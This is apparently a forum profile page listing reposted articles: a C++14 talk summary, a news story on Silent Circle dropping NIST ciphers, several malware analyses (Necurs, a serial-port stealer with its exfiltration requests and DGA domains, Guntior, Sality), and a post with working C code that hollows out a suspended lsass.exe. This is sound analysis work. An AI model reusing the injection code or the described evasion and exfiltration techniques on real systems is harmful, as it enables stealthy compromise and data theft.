Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18736

  • Joined

  • Last visited

  • Days Won

    711

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=1]C++14: Through the Looking Glass[/h] Date: September 5, 2013 from 1:15PM to 2:30PM Day 2 009 Speakers: Michael Wong [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, Windows Phone, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” Zip MP3 (Audio only) [h=3]File size[/h] 56.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 338.7 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 182.8 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 744.4 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 520.1 MB High Quality WMV (PC, Xbox, MCE) “The time has come,” the ISO said, “To talk of many things: Of move-capture—and literals— Of making lambdas sing— And why deduction is so hot— And if digits should grow wings?” So have you heard of the next C++ Standard? No, it is not C++11. Even though C++11 has just been ratified, C++14 will likely replace C++11 by next year. By now, we have enough experience with C++11 to know where we are missing various fingers and toes such as: Why do we not have move capture in lambdas? How about some real user-defined literal suffixes? Why did we stop with monomorphic lambdas? If lambda returns can be deduced, why not normal functions? Could we get digit separators? C++14 will be more than a bug-fix release, and will contain some important enhancements on top of C++11. It will remove some of the major annoyances from C++11, that we already know of. But more importantly, how will this change the language, library and some important idioms? Sursa: C++14: Through the Looking Glass | GoingNative 2013 | Channel 9
  2. Nytro
    Silent Circle Moving Away From NIST Ciphers in Wake of NSA Revelations by Dennis Fisher The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering, as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA’s influence on NIST’s development of ciphers in the last couple of decades. Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it’s in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein. “At Silent Circle, we’ve been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision. Twofish is a cipher suite written by Bruce Schneier and it was one of the finalists during the AES competition, but lost out to the Rijndael algorithm. It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle’s products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalists in the recently completed SHA-3 competition. “We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I’m a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said. The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA‘s influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government and many of those standards are adopted by other organizations, specifically crypto standards. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual EC_DRBG random number generator developed under its supervision. “The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said. Silent Circle’s move away from AES and SHA-2 shouldn’t be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them. “This doesn’t mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn’t mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA’s perfidy, along with the rest of the free world. For us, the spell is broken. We’re just moving on. No kiss, no tears, no farewell souvenirs,” he said. Sursa: https://threatpost.com/silent-circle-moving-away-from-nist-ciphers-in-wake-of-nsa-revelations/102452#.UkmXXBtaei8.twitter Sunt doar niste idei de luat in considerare.
  3. Nytro
    [h=1]Necurs rootkit under microscope[/h] Okay, we already know about Necurs, just remind it interesting features: Highly difficult in terms of removal from infected system; Targeted to blocking drivers around 30 AV products [and 130 drivers in total]; Also targeted to x64 platform [has x64 version of driver]; Driver has obfuscated relocatable code; Provides for itself the earliest start in the system [before all AV or Anti-malware drivers and system drivers]; Has it's own PE-loader with features of module relocation and IAT tuning for creation a complete copy of working driver; Three types of black list: checking version info, special code signatures and drivers names. I already wrote about detection of this rootkit by various anti-rootkits here Security/malware blog: Necurs rootkit detection. In that post also listed symptoms of infection and various kernel anomalies. Today we'll talk about Necurs more detail. https://twitter.com/artem_i_baranov/status/284941235934875648 First of all - black list and how it's implemented. According to list, which is subject to examination by the rootkit, it includes about 30 various AV products (checking via version info), and 130 various drivers (checking via image names comparison). Full list of vendors avalaible here - Necurs targeted to prevent work products of these firms: Agnitum Ltd ALWIL S - Pastebin.com and list of drivers here - Necurs targeted to prevent work the following drivers: kprocesshacker.sys Vb - Pastebin.com. https://twitter.com/artem_i_baranov/status/284309401605648387 https://twitter.com/artem_i_baranov/status/284310691366727680 Before you start the static analysis you should retrieve decrypted version of driver. In normal encrypted state it looks like this: To be convinced that rootkit is active, you need to check presence of NtSecureSys device object. On the next step need to dump it decrypted body from memory with help of anti-rootkit or windbg. Ok, let's do it with windbg. Necurs sets some hooks to SSDT and this is one of the start point for dumping it image from memory. Next we can dump it from memory. Instead !pool command you can use search for MZ header in reverse order for retrieving start of decrypted copy: s 822bbe2b L-10000 'M' 'Z' Decrypted driver: Start point of black list checks - LoadImageNotifyRoutine function. Detailed info about this feature http://msdn.microsoft.com/en-us/library/windows/hardware/ff559957(v=vs.85).aspx. This callback is called every time when new driver [or user mode image] was loaded in system [or in process]. This function contains all types of blacklist checks. For example, on this screenshot below is represented check via vendors names in version info. If the driver is blacklisted, Necurs patches it entry point with two instructions, so DriverEntry after that returns STATUS_UNSUCCESSFULL and IO manager not load this driver. Rootkit also contains two special white lists of drivers that not included into black list. Collection of information into white list rootkit performs on stage of initialization. Rootkit performs scanning of \drivers directory and look for drivers not included into blacklist. Also it walks by services registry key and adds drivers into these lists. To avoid misunderstanding it adds loaders into these lists. Ways of drivers entry point modifications looks like: Necurs also blocks registry operations for own service key. So, any attempt to access to key fails. It possible with help of http://msdn.microsoft.com/ru-ru/library/windows/hardware/ff545879(v=vs.85).aspx Similar situation with file system. Necurs attaches his device object to volume and tracks all FS operation, so rootkit body on volume is unaccessible. Another interesting feature of Necurs - possibility of start before ALL drivers in the system [including boot bus extender drivers]. But on clean system we have another picture: Ok, all right. The conclusion is obvious: Necurs adds itself into "Boot Bus Extender" group and modifies priority ("Tag") of all drivers from this group (increases their Tag numbers by one, +1). Detailed about priority of drivers load, look CurrentControlSet\Services Subkey Entries Summary: Necurs also registers callback for tracking operations about handle creation for process with help of ObRegisterCallback. API - http://msdn.microsoft.com/en-us/library/windows/hardware/ff558692(v=vs.85).aspx From this callback rootkit performs modification of original final desired access for the handle in special cases of handle opening. Mission of NtOpenProcessHook consists in blocking open handle operation for process which rootkit considers as trusted. According to Microsoft Malware Protection Center (MMPC) Necurs found on more than 83,000 machines and Microsoft report calls rootkit a "prevalent threat". This is not surprising after disclosure of the threat, it becomes clear why this is so. http://www.darkreading.com/risk-management/167901115/security/attacks-breaches/240144203/necurs-rootkit-spreading-quickly-microsoft-warns.html Unexpected reboot: Necurs - Microsoft Malware Protection Center - Site Home - TechNet Blogs Fingerprints: x32 version: SHA256: 742a3c8c0a3601af29daffb966e947334d4f20501e5568b9c9fbf4c3526b4b84 SHA1: 30f63b8cae41a97456a82131c4577a2020697b89 MD5: 0907292986e05a8752bc1863556d229e File size: 59776 bytes x64 version: SHA256: b3fea8183670ecf6150325f05aed28dfa27d7c6d2c1007808661f97c27fd7e1e SHA1: d69b06801a8378e8c9ac8b369cb9e14ef8c8d479 MD5: 39b447e293979ac7259d4d9a2711c9a0 File size: 75720 bytes posted by https://twitter.com/artem_i_baranov Posted 29th December 2012 by Artem Sursa: Security/malware blog: Necurs rootkit under microscope
  4. Nytro
    [h=1]Investigation an interesting kernel mode stealer[/h] https://twitter.com/artem_i_baranov/status/228409424996352001 About two weeks ago my friend R136a1 from kernelmode forum came across with dropper that installs driver in the system. We decide make research of them, and it was not a mistake of starting it analyse... Initial dropper hash: SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74 MD5: 9c0744b8119df63371b83724bafe2095 File size: 32768 bytes On this moment can tell exactly that only one or two vendors identified it with malware family. Main purpose of dropper - extract driver from itself and install it in the system. Driver masked as USB-driver and always extracted with same name - usbhc.sys. Hash: SHA1: a53d0ef7b3a9f81b133c36af60d2b6acd0f82b74 MD5: 9c0744b8119df63371b83724bafe2095 File size: 32768 bytes One of the most strange thing that I discovered - driver is a fully standalone and not receives commands from user mode. And of course, it not create device object and symbolic link. for user mode interaction. Research led me to a conclusion that driver has one main purpose - stealing data from devices that connect to serial ports of computer and sending it to remote server... For stealing data from these devices it performs preparatory operations. First, it reads the contents of \REGISTRY\MACHINE\HardWare\DeviceMap\SERIALCOMM that stores devices attached to serial ports [devices representing serial ports]. Second, it performs attaching to all this devices. After rootkit attached it device, device stack of serial has view: Second very interesting thing in this case that all network-based communication with remote server also found in driver: - DGA (Domain Generation Algorithm) - DNS via UDP (for convert domain names into IP) - HTTP-based communication via TCP - Special communication with ndisrd.sys driver. For retrieving domains and resolve it to IP-addresses, driver uses such technique. First, it looking for DhcpNameServer parameter for each interface that it found at \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ On next step, it generates domains and calls DNS-service for response about it status. All further communication will be done through this server (which was received via DNS). In the end of post listed all domains that it polls. Network communication completely based on TDI (Transport Device Interface) [look WDK for it description or this tutorial Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject] Preparing the server connection has the form (in SDK term - creating socket). Next it will connect to remote server: Internally in driver, socket described by this structure: struct TDI_CONNECTION_INTERNAL { PFILE_OBJECT foTransportAddress; HANDLE hTransportAddress; PVOID foConnection; HANDLE hConnection; .... } After connection with server was set, it can send requests to it via HTTP. Requests have view: GET /srv.php?&id=uniqueID&mark=METKA&special_marker_opt HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: host Connection: close Simple communication with server has view (rollcall): -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: perwadav.org Connection: close <- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 SERVERISOK -> server status After connection was established, driver performs downloads a dropper of ndisrd.sys from server, with request: GET /srv.php?&id=uniqueID&mark=METKA&f=os_ver HTTP/1.1 Variable of os_ver has view n_xp_32 or n_7_32 Basic requests formed with func: Conversation: Driver perform saving dropper into: \SystemRoot\System32\kb_random.exe In my case: \SystemRoot\System32\kbVOTHBNAU.exe From driver: Downloaded dropper: SHA1: 911c027e5f4acf4a75d0cf8e751d0ba8fbbd0959 MD5: a93b5454f4492a4a8d971811f2d12b1e File size: 81805 bytes After dropper was downloaded, it will be installed by driver. Installation performs in context of trusted process - explorer or services (in depend of OS version). Purpose of downloaded dropper - installation of ndisrd.sys driver. Rootkit driver performs opening device of ndisrd. Purpose of IOCTLs that rootkit sends to NDISRD could not identified, but there is a list of them: 830020D0 830020D4 830020D8 830020DC 830020C4 As I said before main purpose of rootkit - stealing data from serial devices and sending it to server. Stealing of data performed with registering of completion routine in Write and Read - IRP-dispatch functions. Driver registers the device in the chain of serial-devices, and can see all requests that pass through the chain. IRP_MJ_READ handler - registers completion routine and calls next on the stack. Completion routine has view: After data was captured, wakes up a special thread, which writes cached data to a file. Thread writes data to file - \SystemRoot\System32\svlog.log. After data was written, thread sets a special event which signaling that data was written to file. Thread that response for sending data from file to server: -> GET /srv.php?&id=GOG73FRHOBFI&mark=METKA&a= HTTP/1.1 Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: perwadav.org Connection: close Data of file <- HTTP/1.1 200 OK..Date: Mon, 23 Jul 2012 17:13:16 GMT Server: Apache/2.2.3 (CentOS)..X-Powered-By: PHP/5.1.6 Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 SERVERISOK -> server status Information about malicious domain: This guy linkedin profile Nikolay Petrachkov | LinkedIn. You can download paper about dropper by R136a1 here http://artemonsecurity.com/research_of_unk_malware.pdf List of domains: oqdxvvbk.com perwadav.org ebcgndvj.org qdrhandp.org tbkfopaf.org twmhimdj.org thgdabbj.com efjwirmb.org qxkomgei.com bbfsyfsr.com jbpgfqra.org anwfejhx.com frstfnuh.org xbcfgule.com cyfohwwf.com catjdhuu.org woyhiepx.org fmegpykr.com bowgtptk.com dnrdyute.org jchgbmmo.org poxldxhv.org mkrhwons.org aovinvsi.org ivogeuom.com mubrnyxd.org emhedcxc.org ibqanwif.org umspakwh.org wianbpdb.com oejkewmq.org gqnjmmgd.org lpdbwrfu.com kwkdraat.org dfogsbau.org gjfxavjw.org idrlbacl.org xavostmi.org sxdhddbb.com wbqwvapj.org jiqcsvng.com gkceusvc.com vssqfbmq.org pcawxcwp.com lpjnerpe.org safcoyho.com llbeoaix.com oirhxgpf.org ygdmlsgl.org fyxfattr.com tdcqhkne.com wwdstess.org eexeufwo.org wbwfjosa.org ixskfbvp.org fmcspasm.org wdjjkmwv.com svpaidvo.org vnhcftma.org twjotfct.org fwlckqdv.org bjfgwabb.com cdobjfic.org qjfhsiua.org enldxohy.com dcnpyqlg.org nsbjdfyq.org cyhwpiaw.org mnbpwbjj.org volgbbox.org tgrwfjpv.com lgqxwrkf.org xwalgbjg.com yuwbhxeu.com hulosvof.org qxpvprdy.com ijjxoocp.org fbrebqna.com tpxirylu.com keukrpqf.org rxyjkcwj.org oucmtrhv.com rxftpvku.com wlxrrqyd.org ybljdhos.org qwkpxcct.org qecgrdxg.org dudfymdl.org sesjvgii.com yxcxjriu.org ljmiphjx.org btotkygq.org fodbotqn.org rfsojypy.com mbdoebhh.org johqyxsw.org gldfgkey.com fvpujviq.org fyclctjf.org xnvwdmyf.org posted by https://twitter.com/artem_i_baranov Posted 26th July 2012 by Artem Sursa: Security/malware blog: Investigation an interesting kernel mode stealer
  5. Nytro
    [h=1]Guntior - detailed analysis of the Chinese bootkit[/h] https://twitter.com/artem_i_baranov/status/225509678367506433Original dropper that contains bootkit dropper: SHA1: e83ca87a39a5f15ca5942fd57d78e790861c2937 MD5: 15e692cf34a70fb364591622bff1e43a File size: 86027 bytes This original dropper extracts bootkit dropper from itself and launches it on execution with same name. Bootkit dropper: SHA1: 5ecefefe4bbfc040927e827ab81c10caf5d10f90 MD5: f72e3d86b8f4f97d103ff1b7f87213f2 File size: 54272 bytes Bootkit dropper stores it components in resource section in crypted state. Decryption routine has view: Bootkit dropper has an interesting method of calling OEP via SEH handler with generating an exception. OEP has view (dropper supports two modes of running - as dll and exe). Anti-debug/anti-emu feature: On the next stage it performs an interesting trick to load itself via dll and continuing initialization as dll. In the first, it copies itself to system directory with random name.tmp and patches PE-characteristics by setting Dll flag. In the second, it hooks imm32.dll!ImmLoadLayout and ntdll.dll!ZwQueryValueKey. ZwQueryValueKey hook has view: After hooks were set it tries initiate keyboard layout switching (that was already registered via creating new parameter in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts). Malicious keyboard layout has view: Finally revert layout to original. Second stage initialization via dll loading. At this stage dll should be loaded into working processes in system and first that it does - sets special event to signal bootkit exe dropper about success of running. So, if injection was failed, it runs next phase. Before load it's driver, it performs some actions targeted to disable some protections that can present in the system. - In case of HintClient.exe that belongs to company Shanghai Hintsoft Co.,LTD. - http://www.hintsoft.com.cn/ sends a special IOCTL code to it driver (look code at 00403A3B). - In case of Drvmon (drivers monitoring tool) also sends a special IOCTL to unknown driver (look code at 00403B0A). Next it loads driver and infects MBR. Driver: SHA1: adcdee632d7915f5e73669d809d9713e9250b81d MD5: c1f5c5af49243e497ae979f2622ab5d0 File size: 4704 bytes Features of driver: - Low-level disk I/O - Processes killlig Creates device with name \Device\Guntior for communicate with ring3. \Device\Guntior \??\Guntior RSDS C:\sys.pdb memcpy MmMapLockedPagesSpecifyCache memset IoDeleteSymbolicLink RtlInitUnicodeString IoDeleteDevice RtlGetVersion IofCompleteRequest IoCreateSymbolicLink IoCreateDevice PsLookupProcessByProcessId MmIsAddressValid ObfDereferenceObject ObReferenceObjectByPointer ntoskrnl.exe WRITE_PORT_BUFFER_USHORT HalGetBusData READ_PORT_BUFFER_USHORT KfRaiseIrql KfLowerIrql Driver is a loaded via very interesting trick with sending a special IOCTL to PnpManager. Unlike other bootkits that intercept functions of disk.sys or atapi.sys for hiding malicious MBR and payload in the end of the disk, this bootkit intercepts nothing and supports unloading (it has an unloading routine). Original (not-infected) MBR has view: Malicious (by 0x190 offset it stores offset of its extension): In the end of disk bootkit stores: - Original MBR - Extension of malicious boot-code - Dll - Driver Main payload is stored into dll [resource number 111]. Dropper extracts it from resource, decrypts and writes into systemroot\system32\appmgmts.dll. It also completely rewrites systemroot\system32\sfc_os.dll by dll body. Internally dll stored as rewritten sfc_os.dll from Chinese Windows XP. Dll targeted to killing processes: nod32krn.exe egui.exe ekrn.exe 360tray.exe 360leakfixer.exe 360Safe.exe safeboxTray.exe 360safebox.exe 360sd.exe ZhuDongFangYu.exe 360rp.exe 360sdupd.exe Calc.exe KSWebShield.exe kxesapp.exe kxeserv.exe kwstray.exe kxedefend.exe upsvc.exe kxescore.exe KVExpert.exe kxetray.exe KSafeSvc.exe KSafeTray.exe guiyingfix.exe RavMonD.exe RsTray.exe RsAgent.exe RegGuide.exe RsMain.exe RsCopy.exe Rav.exe KVSrvXP.exe KVExpert.exe KVMonXp.exe avp.exe avp.exe ras.exe knownsvr.exe rstray.exe knsdtray.exe knsd.exe knsdsvc.exe knsdsve.exe QQPCLeakScan.exe QQPCWebShield.exe QQPCTAVSrv.exe QQPCRTP.exe QQPCMgr.exe QQPCUpdateAVLib.exe QQPCTray.exe QQRepair.exe QQPCPatch.exe Killing processes code: HTTP-request: HTTP/1.1 Accept: */* Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: %s Connection: Keep-Alive Dropper with decrypted payload available for download here: KernelMode.info • View topic - Guntior bootkit (Chinese combine) Dumps of malicious code with some comments by Peter here: KernelMode.info • View topic - Guntior bootkit (Chinese combine) posted by https://twitter.com/artem_i_baranov Posted 18th July 2012 by Artem Sursa: Security/malware blog: Guntior - detailed analysis of the Chinese bootkit
  6. Nytro
    [h=1]Sality rootkit analysis[/h] Sality is a well known family of file-infectors (or PE-infectors or just a viruses). And as malware it has a very long story of evolution since 2003. Latest it versions contain rootkit on board to complicate detection from side of AV-scanners. Driver has such features: Processes termination via NtTerminateProcess; Blocking access to some AV web-resources via IP Filtering; Small size ~ 5 KB. According analysis, rootkit is targeted to Windows starting NT4 and finishing Vista. It should be said in advance that this rootkit is not a NEW and not contains some features which have modern rootkits or bootkits. Researched version of rootkit has appeared ITW since beginning of 2010. Rootkit creates device with name: \Device\amsint32 \DosDevices\amsint32 and this is signal to infection. Rootkit contains usual most famous way of process killing, which is used by almost all "old-school" rootkits. Sality uses old model of IP filtering for blocking access to web-resources that belong AV-vendors. This technique is called IP Filtering. More info: Windows 2000 Filter-Hook Driver example NT networking & kernel mode: drivers, articles, sources and MSDN http://msdn.microsoft.com/en-us/library/windows/hardware/ff548976(v=vs.85).aspx. List of affected vendors: This feature requires from driver to registering a callback function which will be called for IP-packets. This function will decide what to do with the packet: to forward it or drop. Registered callback - fnFilterHookIP will looking for presence of AV-vendors strings in data of packet. In case of hit it forces IP-driver to drop this packet. Encrypted AV vendors strings in it body: Detection ratio: SHA256: e0b193d47609c9622aa018e81da69c24b921f2ba682f3e18646a0d09ec63ac2b SHA1: ef9a19ba89021179930888264290367b5d106a44 MD5: bf31a8d79f704f488e3dbcb6eea3b3e3 File size: 5157 bytes posted by https://twitter.com/artem_i_baranov Posted 15th January by Artem Sursa: Security/malware blog: Sality rootkit analysis
  7. Nytro
    [h=2]New method of injection[/h] [h=2]Introduction[/h] I disovered a new method of injection (I don't know if it is really new) in a malware dropped by duqu. So I want to share it with you and as usual write a p0c. Edit : This method is not new, apparently it have been using by game cheats for years, but instead of using ZwUnmapViewOfSection they use FreeLibrary. [h=2]Injection Method[/h] The malware in question is simply a keylogger, but it uses a nice tricks for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can he do with this address, if we look at PEB struct : >dt nt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void It will get the ImageBaseAddress at offset 0x8, by reading it with ReadProcessMemory(). First it create a section with ZwCreateSection(), then it will in the actual process (not in lsass.exe supended), ZwMapViewOfSection() with argument BaseAdress equal to 0, copy old lsass.exe PE image and modify entry point, he will do the same operation on lsass.exe process but with BaseAdress equal to BaseImage, but wait ! if we read the documentation of ZwMapViewOfSection, we will get a NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES, and the answer is no, because before the second ZwMapViewOfSection, it will perform ZwUnmapViewOfSection() with BaseAddress equal to ImageBaseAddress on lsass.exe process. And if you wonder : "Wait what !? is it possible ?", and the answer is yes. With this tricks the malware is able to replace ALL the PE image of the suspended process. [h=2]p0c[/h] So I decided to rewrite this tricks, to well understand the stuff done by the malware ( maybe you will better understand what I explained before ). Tested under Windows XP SP3, and Windows Seven SP1 (32 bits). Main.c : #include "main.h"int get_entrypoint(char *read_proc) { IMAGE_DOS_HEADER *idh = NULL; IMAGE_NT_HEADERS *inh = NULL; idh = (IMAGE_DOS_HEADER*)read_proc; inh = (IMAGE_NT_HEADERS *)((BYTE*)read_proc + idh->e_lfanew); printf("Entrypoint = %x\n", inh->OptionalHeader.AddressOfEntryPoint); return (inh->OptionalHeader.AddressOfEntryPoint); } int main(void) { STARTUPINFO si; PROCESS_INFORMATION pi; char path_lsass[260]; PROCESS_BASIC_INFORMATION pbi; DWORD nb_read; DWORD ImageBase; HANDLE hsect; NTSTATUS stat; PVOID BaseAddress = NULL; PVOID BaseAddress2 = NULL; DWORD oep; memset(&si, 0, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); memset(?, 0, sizeof(PROCESS_INFORMATION)); memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION)); ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\lsass.exe", (LPWSTR)path_lsass, 260); wprintf(L"[+] New Path for lsasse.exe = %s\n", path_lsass); if (!CreateProcess((LPWSTR)path_lsass, NULL, NULL, NULL, NULL, CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, NULL, NULL, &si, ?)) { printf("[-] CreateProcessW failed\n"); printf("LatError = %x\n", GetLastError()); return (-1); } ZwQueryInformationProcess = (long (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwQueryInformationProcess"); ZwMapViewOfSection = (long (__stdcall *)(HANDLE,HANDLE,PVOID *,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection"); ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE, PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUnmapViewOfSection"); ZwCreateSection = (long (__stdcall *)(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection"); if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL || ZwUnmapViewOfSection == NULL || ZwCreateSection == NULL) { printf("[-] GetProcAddress failed\n"); return (-1); } if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0) { printf("[-] ZwQueryInformation failed\n"); return (-1); } printf("[+] UniqueProcessID = 0x%x\n", pbi.UniqueProcessId); if (!ReadProcessMemory(pi.hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) && nb_read != 4) { printf("[-] ReadProcessMemory failed\n"); return (-1); } printf("[+] ImageBase = 0x%x\n", ImageBase); char read_proc[0x6000]; if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x6000, &nb_read) && nb_read != 0x6000) { printf("[-] ReadProcessMemory failed\n"); return (-1); } printf("(dbg) Two first bytes : %c%c\n", read_proc[0], read_proc[1]); oep = get_entrypoint(read_proc); LARGE_INTEGER a; a.HighPart = 0; a.LowPart = 0x8EF6; if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) { printf("[-] ZwCreateSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); return (-1); } SIZE_T size; size = 0x8000; BaseAddress = (PVOID)0; if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare */, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); return (-1); } memset((BYTE*)read_proc + oep, 0xCC, 1); memcpy(BaseAddress, read_proc, 0x2000); BaseAddress = (PVOID)ImageBase; printf("BaseAddress = %x\n", BaseAddress); ZwUnmapViewOfSection(pi.hProcess, BaseAddress); if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare */, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); system("pause"); return (-1); } printf("BaseAddress = %x\n", BaseAddress); ResumeThread(pi.hThread); system("pause"); return (0); } And the include file : #include <stdio.h>#include <Windows.h> #if !defined NTSTATUS typedef LONG NTSTATUS; #endif #define STATUS_SUCCESS 0 #if !defined PROCESSINFOCLASS typedef LONG PROCESSINFOCLASS; #endif #if !defined PPEB typedef struct _PEB *PPEB; #endif #if !defined PROCESS_BASIC_INFORMATION typedef struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION; #endif; typedef LONG NTSTATUS, *PNTSTATUS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); NTSTATUS (__stdcall *ZwQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength OPTIONAL ); NTSTATUS (__stdcall *ZwCreateSection)( PHANDLE SectionHandle, ACCESS_MASK DesiredAccess, PDWORD ObjectAttributes OPTIONAL, PLARGE_INTEGER MaximumSize OPTIONAL, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle OPTIONAL ); NTSTATUS (__stdcall *ZwMapViewOfSection) ( HANDLE SectionHandle, HANDLE ProcessHandle, OUT PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect ); NTSTATUS (__stdcall *ZwUnmapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ); So for the p0c i just put a INT3 at entry point of lsass.exe, and here the result : [h=2]Conclusion[/h] This method is really fun because it don't use SetThreadContext(), for updating eip before resuming thread execution. Sursa: w4kfu's bl0g
  8. Nytro
